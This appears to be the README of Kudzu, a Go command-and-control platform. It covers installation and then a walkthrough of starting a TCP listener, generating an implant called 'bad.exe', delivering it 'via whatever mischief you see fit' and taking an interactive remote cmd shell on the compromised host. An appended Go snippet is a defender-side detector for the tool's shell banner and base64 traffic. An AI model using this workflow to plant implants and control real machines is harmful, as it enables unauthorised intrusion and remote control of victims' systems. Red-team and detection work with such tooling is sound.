Kudzu
An extensible Go C2 platform
Overview
Kudzu is a Go-based C2 platform with an emphasis on extensibility. My goal was to provide a platform to which new scripts and exploits could be easily added and modified, and written in a modern language. It is a lofty goal, especially for a lone coder of dubious skill, but with enough time, determination, and caffeine, great things are possible!
Quick Start
Installation
Windows:
>> go get -u github.com/TerminalJockey/Kudzu
>> cd %GOPATH%\src\github.com\TerminalJockey\Kudzu
>> go build -o KudzuConsole.exe main.go
>> KudzuConsole.exe
Linux:
>> go get -u github.com/TerminalJockey/Kudzu
>> cd ~/go/src/github.com/TerminalJockey/Kudzu
>> go build -o KudzuConsole main.go
>> sudo ./KudzuConsole
Usage
The usual workflow is as follows:
Start listener
<kudzu> nodes
<kudzu nodes> setop nodetype tcp
<kudzu nodes> setop addr 127.0.0.1
<kudzu nodes> setop port 31337
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
6e770a3487 127.0.0.1:7896
<kudzu nodes>
Generate implant
<kudzu> implants
<kudzu implants> setop filename bad.exe
<kudzu implants> setop listener 6e770a3487
<kudzu implants> setop implanttype cmd
<kudzu implants> run
{cmd {6e770a3487 0xc0000049e0}}
proceed? Y/N > y
generated implant! check ../tmp/
<kudzu implants>
Deliver your implant via whatever mischief you see fit (???)
Profit!
<kudzu implants> Got Connection ID: 34ffa7713f 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact 34ffa7713f
interacting...
34ffa7713f
found node for interaction
Microsoft Windows [Version REDACTED]
(c) 31337 Microsoft Corporation. All rights reserved.
C:\Users\TESTER\>whoami
desktop\TESTER
C:\Users\TESTER\>
Notes
Each menu has a help option, and you can swap to your desired menu simply by typing the relevant keyword as shown above.
Using the runscript command while in an implant cmdshell causes the base64 script contents to be written to the cmdshell's stdin. While it doesn't look like anything is executed or submitted, it is unintended and may (read: will likely) generate some weird-looking traffic.
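A defender-side check for the traffic described in the note above, added here as an example and not part of Kudzu's code: it flags a reassembled TCP payload that carries both the cmd.exe banner shown in the session above and a long, well-formed base64 run. It assumes the tcp node carries shell I/O unencrypted, which the page does not state; `Inspect`, `Finding`, `SamplePayload` and the 64-character threshold are hypothetical names and values chosen for the example.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// minRun is an assumed threshold (in base64 characters); tune it to your baseline.
const minRun = 64

var b64Run = regexp.MustCompile(fmt.Sprintf(`[A-Za-z0-9+/]{%d,}={0,2}`, minRun))

// Finding records which indicators one reassembled TCP payload contained.
type Finding struct {
	ShellBanner bool // cmd.exe startup banner present
	Base64Bytes int  // decoded size of the longest well-formed base64 run
}

// Suspicious is true when a shell banner and a large base64 blob share a stream.
func (f Finding) Suspicious() bool { return f.ShellBanner && f.Base64Bytes > 0 }

// Inspect scans a payload for the cmd.exe banner and for long base64 runs.
func Inspect(payload []byte) Finding {
	s := string(payload)
	f := Finding{ShellBanner: strings.Contains(s, "Microsoft Windows [Version") &&
		strings.Contains(s, "Microsoft Corporation. All rights reserved.")}
	for _, run := range b64Run.FindAllString(s, -1) {
		// DecodeString rejects runs that are not valid padded base64.
		if dec, err := base64.StdEncoding.DecodeString(run); err == nil && len(dec) > f.Base64Bytes {
			f.Base64Bytes = len(dec)
		}
	}
	return f
}

// SamplePayload builds a constructed stream: banner, prompt, then a base64 blob.
func SamplePayload() []byte {
	blob := base64.StdEncoding.EncodeToString([]byte(strings.Repeat("Write-Output 'constructed sample'\n", 3)))
	return []byte("Microsoft Windows [Version REDACTED]\r\n" +
		"(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\TESTER\\>" + blob + "\r\n")
}

func main() {
	fmt.Printf("%+v\n", Inspect(SamplePayload()))
}
```

Long unbroken alphanumeric strings that happen to decode as base64 will also match, so treat the base64 indicator as meaningful only in combination with the banner.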